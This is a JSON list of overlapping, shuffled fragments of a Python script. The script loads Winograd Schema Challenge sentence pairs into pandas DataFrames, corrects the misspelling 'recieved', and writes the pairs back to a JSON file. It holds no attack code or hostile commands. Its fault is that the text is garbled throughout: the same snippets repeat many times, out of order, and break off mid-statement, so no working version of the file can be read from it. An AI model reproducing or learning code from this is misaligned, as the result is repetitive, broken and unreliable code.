[ "'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for", "else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received')", "pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r',", "row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable']", "with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for", "E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226", "'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in", "= False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched']", "'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index,", "generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = []", "json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'],", "as fp: wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json),", "in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else", "False if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable'", "wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative',", "in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence':", "= correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence',", "rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE,", "dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched':", "row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile, ensure_ascii=False,", "noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df", "row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched", "open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i", "for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else", "= wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence =", "not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] =", "False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] ==", "rows = [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if", "correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence =", "incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r',", "row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative", "from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp:", "in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] #", "'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json =", "len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226", "wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if", "rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence',", "= [] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence,", "encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i in range(0,", "if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '':", "= incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def", "if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not", "row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable", "if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated']", "in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df =", "import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json =", "E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df =", "df def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic =", "[] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence':", "'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative'", "not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row", "if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received')", "'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched']", "== '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with", "wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence',", "row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row", "wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched',", "return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp)", "wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence", "\\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\", "row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative dic['is_switchable'] =", "'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows", "'is_associative' not in row else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in", "df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows", "i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution']", "pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def", "index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched}", "= row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as", "dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] =", "= [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness']", "wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence',", "= pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df", "row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not", "2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence", "wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution']", "wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved',", "for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']])", "import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE,", "{'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched':", "WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp)", "json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution']", "wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence',", "'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else", "fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'],", "if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not", "generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = []", "= wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution']", "encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)):", "wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated'])", "= pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as", "def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows =", "[] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'],", "incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json():", "i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df", "= row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile,", "df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8')", "'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i in", "import json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json():", "json_rows = [] for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence':", "'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative']", "wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'],", "for index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence,", "incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df", "generate_json(df): json_rows = [] for index, row in df.iterrows(): dic = {'question_id': index,", "range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows,", "'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = []", "[] for i in range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\", "correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows,", "= {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched,", "'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index, row in", "open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for i", "wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched',", "'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False", "correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence'])", "dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows,", "dic['is_associative'] = False if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False", "def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic = {'question_id':", "df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return", "wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness']", "index, row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence':", "<filename>src/winograd_collection_manipulation/wsc_json_handler.py<gh_stars>1-10 import json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def", "WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows", "row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if", "columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp: wsc_json", "with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows = [] for", "pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with open(WINOGRAD_SCHEMAS_FILE, 'r', encoding='utf-8') as fp:", "else wsc_json[i+1]['substitution'] # noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else", "'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] = False if 'is_associative' not in row else row.is_associative dic['is_switchable']", "row in df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence,", "'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return df def generate_df_from_json(): with", "fp: wsc_json = json.load(fp) rows = [] for i in range(0, len(wsc_json), 2):", "dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile: json.dump(json_rows, outfile, ensure_ascii=False, indent=2)", "row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched']", "else row.is_associative dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if", "df.iterrows(): dic = {'question_id': index, 'correct_sentence': row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence,", "# noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence])", "in row else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched", "and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated", "= json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'],", "wsc_json[i]['is_switchable'], wsc_json[i]['is_associative'], wsc_json[i]['translated']]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable',", "= False if 'is_associative' not in row else row.is_associative dic['is_switchable'] = False if", "json import pandas as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with", "dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic)", "# noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] #", "= json.load(fp) rows = [] for i in range(0, len(wsc_json), 2): correct_sentence =", "src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json", "row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w') as outfile:", "def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as fp: wsc_json = json.load(fp) rows =", "\\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved',", "noqa E226 incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa", "wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence,", "= [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'], wsc_json[i]['is_switchable'],", "pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8') as", "return df def generate_json(df): json_rows = [] for index, row in df.iterrows(): dic", "'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows =", "incorrect_sentence = wsc_json[i]['substitution'] if not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence", "columns=['correct_sentence', 'incorrect_sentence', 'manually_fixed_correct_sentence', 'manually_fixed_incorrect_sentence', 'correct_switched', 'incorrect_switched', 'is_switchable', 'is_associative', 'translated']) return df def generate_json(df):", "'is_switchable', 'is_associative', 'translated']) return df def generate_json(df): json_rows = [] for index, row", "'received') incorrect_sentence = incorrect_sentence.replace('recieved', 'received') rows.append([correct_sentence, incorrect_sentence]) df = pd.DataFrame(rows, columns=['correct_sentence', 'incorrect_sentence']) return", "as pd from src.helpers.consts import WINOGRAD_SCHEMAS_FILE, WINOGRAD_SCHEMAS_ORIGINAL_FILE def generate_df_from_original_json(): with open(WINOGRAD_SCHEMAS_ORIGINAL_FILE, 'r', encoding='utf-8')", "rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence'], wsc_json[i]['incorrect_sentence'], wsc_json[i]['manually_fixed_correct_sentence'], wsc_json[i]['manually_fixed_incorrect_sentence'], wsc_json[i]['correct_switched'], wsc_json[i]['incorrect_switched'],", "range(0, len(wsc_json), 2): correct_sentence = wsc_json[i]['substitution'] if wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa", "dic['is_switchable'] = False if 'is_switchable' not in row else row.is_switchable if dic['is_switchable'] and", "not wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence", "wsc_json[i]['correctness'] \\ else wsc_json[i+1]['substitution'] # noqa E226 correct_sentence = correct_sentence.replace('recieved', 'received') incorrect_sentence =", "else row.is_switchable if dic['is_switchable'] and dic['correct_switched'] == '': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] =", "'': dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE,", "'translated']) return df def generate_json(df): json_rows = [] for index, row in df.iterrows():", "row.correct_sentence, 'incorrect_sentence': row.incorrect_sentence, 'manually_fixed_correct_sentence': row.manually_fixed_correct_sentence, 'manually_fixed_incorrect_sentence': row.manually_fixed_incorrect_sentence, 'correct_switched': row.manually_fixed_correct_switched, 'incorrect_switched': row.manually_fixed_incorrect_switched} dic['is_associative'] =", "dic['correct_switched'] = row.correct_switched dic['incorrect_switched'] = row.incorrect_switched dic['translated'] = row.translated json_rows.append(dic) with open(WINOGRAD_SCHEMAS_FILE, 'w')", "as fp: wsc_json = json.load(fp) rows = [] for i in range(len(wsc_json)): rows.append([wsc_json[i]['correct_sentence']," ]
